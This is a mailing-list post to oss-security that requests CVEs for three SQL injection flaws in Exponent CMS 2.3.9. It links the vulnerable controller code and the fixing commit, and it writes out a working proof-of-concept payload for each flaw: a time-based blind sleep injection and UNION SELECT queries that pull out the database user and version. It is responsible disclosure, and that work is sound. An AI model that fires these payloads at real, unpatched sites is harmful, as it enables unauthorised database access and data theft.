Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 18 Sep 2016 12:09:04 +0800
From: felix k3y <felixk3y@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request:Exponent CMS 2.3.9 SQL injection vulne
	rabilities

Hi, I reported the following SQL Injection vulnerabilities to the
ExponentCMS team on Sep 13, 2016:

1)
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/addressbook/controllers/addressController.php#L166-L175

2)
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/blog/controllers/blogController.php#L192-L195

3)
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/core/controllers/expCommentController.php#L129-L134


/index.php?controller=address&action=activate_address
In the first case, you can sending "id=1 and if(1,sleep(1),0)%23" in the
POST data of an HTTP request;

/index.php?controller=blog&action=show&title=xx' union select
1,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23
In the second, you can sending "title=xx' union select
1,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23" in the GET data of an
HTTP request;

/index.php?controller=expComment&action=showComments&content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s&config[disable_nested_comments]=1
In the last one , you can sending
"content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s" in
the GET data of an HTTP request.



And Now, all SQL Injection vulnerabilityies have been fixed.

https://exponentcms.lighthouseapp.com/projects/61783/changesets/e916702a91a6342bbab483a2be2ba2f11dca3aa3
https://github.com/exponentcms/exponent-cms/commit/e916702a91a6342bbab483a2be2ba2f11dca3aa3

I would like to request CVEs for those issues (if not done so).

thx.
--------------------------------------
felixk3y#gmail.com
penghua#silence.com.cn
PKAV Team

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ